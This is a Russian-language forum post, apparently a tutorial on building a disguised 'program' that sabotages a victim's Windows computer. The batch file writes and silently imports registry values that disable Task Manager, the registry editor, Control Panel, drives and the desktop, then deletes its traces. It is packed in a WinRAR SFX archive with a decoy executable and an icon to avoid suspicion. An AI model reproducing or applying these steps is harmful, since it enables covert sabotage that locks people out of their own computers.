Перенёс из другого раздела, а то потеряется.

Теория.
Какой должна быть наша программа?
1. Лёгкое и доступное написание;
2. Должна усложнять работу жертвы до прихода заказчика;
3. Не должна вызывать подозрений;
4. Должна запускаться как обычное приложение (двумя кликами грызуна);
5. Лёгкое обезвреживание.

---1---
Запускаться по клику мышки могут 5 типов фалов: *.exe, *.com, *.scr, *.cmd, *.bat. Из всех приведённых форматов только *.cmd и *.bat позволяют не прибегать к установке сторонних приложений для своего создания, обычного блокнота будет достаточно! Мы остановимся на Bat-файлах. *.bat файлы позволяют создавать текстовые файлы с любыми расширениями(в том числе и *.reg). Мы знаем, что файлы реестра имеют текстовый формат. Делаем вывод: *.bat способен создавать файлы реестра Windows. Но это ещё не всё! Bat позволяет запускать *.reg-файлы и без вопросов добавлять их информацию в реестр. Этим собственно и займёмся. Имя нашего батника будет reestr.bat.
Допустим нам нужно создать файл reestr.reg с данными Windows Registry Editor Version 5.00 и записать его в корневой каталог диска C:\, тогда наш reestr.bat будет содержать такую строку: echo Windows Registry Editor Version 5.00 > C:\reestr.reg. Для добавления последующих строк будем использовать вместо > знак >>. Таким образом, мы создаём необходимый код для добавления в реестр.
---2---
Некоторые параметры реестра отвечают за работу интерфейса ОС, их мы и будем рассматривать.
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System
DWORD DisableTaskMgr, значение 1 - запрещает вызов диспетчера задач
DWORD DisableRegistryTools, значение 1 - запрещает вызов редактора реестра
DWORD NoDispBackgroundPage, значение 1 - скрыть вкладку

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
DWORD NoControlPanel, значение 1 - запрещает запуск апплетов в Панели управления
DWORD NoViewOnDrive, значение сумма "значений дисков". Значение 0 - разрешен доступ ко всем дискам, значение 67108863 (hex:3ffffff) - запретить доступ ко всем дискам (A: - Z: )
Значения дисков:
A: - 1 (2^0)
B: - 2 (2^1)
C: - 4 (2^2)
D: - 8 (2^3)
...
Z:- 33554432 (2^25)
Чтобы запретить доступ к дискам A и D необходимо сложить 1 + 8 = 9.
DWORD NoSetTaskbar, значение 1 - свойства Панели задачи меню Пуск не доступны
DWORD NoChangeStartMenu, значение 1 - запрещает модификацию меню Пуск
DWORD NoStartMenuMorePrograms, значение 1 - убирает подменю Все программы
DWORD NoRecentDocsMenu, значение 1 - убирает пункт меню Недавние документы
DWORD NoTrayContextMenu, значение 1 - запрещает контекстное меню.
DWORD NoDesktop, значение 1 - запрещает рабочий стол
---3---
Создать файл реестра с данными параметрами, ещё полдела, нужно, чтобы он незаметно добавлялся. Поэтому пишем regedit /S C:\reestr.reg, где /S - добавляет данные в реестр без лишних вопросов.
Заметаем следы del C:\reestr.reg.
---4---
Итак, данные мы добавили, следы замели. Остаётся сделать наше творение обычным приложением, то есть перевести её в *.exe формат и заставить, что-то запускать, кроме того, она должна иметь иконку, а как же иначе?
Делается это всё очень просто: во-первых, нам нужно выполнять какую-то программу из-под нашего батника, тогда пишем путь к нашей прожке и одновременно запускаем её @start /MAX C:\Progra~1\SmallFish\Beyond.exe¹. Как вы поняли, исполняемая батником программа будет называться Beyond.exe. Beyond.exe – это любая программа, которую вы хотите запуститься на чужом компе, чтобы показать, что-нибудь пользователю в качестве отвлечения. Не хорошо же предлагать людям нерабочую программу, а с эти Beyond.exe всё будет работать и не вызовет подозрений
Полный код файла reestr.bat:
Сейчас вы зададите вопрос: а откуда же возьмётся Beyond.exe да ещё и в несуществующей папке C:\ Progra~1\SmallFish\Beyond.exe? А вот тут уже нам понадобится обычный архиватор WinRAR!
Берём два файла: а) наш, готовый батник; б) Программу-заставку - Beyond.exe.
Далее создаём SFX-архив.

Во вкладке «Дополнительно» выбираем «параметры SFX»

Cтавим абсолютный путь для распаковки C:\Progra~1\SmallFishes/ . Устанавливаем галку «сохранять и восстанавливать пути». В пункте «выполнить после распаковки:» пишем C:\Progra~1\SmallFishes\reestr.bat

Далее лезем во вкладку «режимы» и настраиваем как на рисунке

И последний штрих. Нужно назначить иконку. Вкладка «текст и значок» как раз для этих целей.


Собственно программа готова.
---5---
Теперь напишем файл SDN.bat для обезвреживания:
PS: поскольку очень многое стало закрытым, то для того, чтобы вернуть всё обратно нам понадобится зайти Пуск-->Выполнить, вписать explorer найти и выполнить sdn.bat. После перезагрузки винда будет как новая.

¹ - Поскольку Bat - это командные файлы DOS'а, то нужно придерживаться его стандартов - 8 символов в названии файла/дирректории и 3 символа в расширении файла. Если мы напишем Program Files , то это будет непонятно, в связи с этим приняты сокращения такие как C:\Progra~1\. Теперь всё будет работать.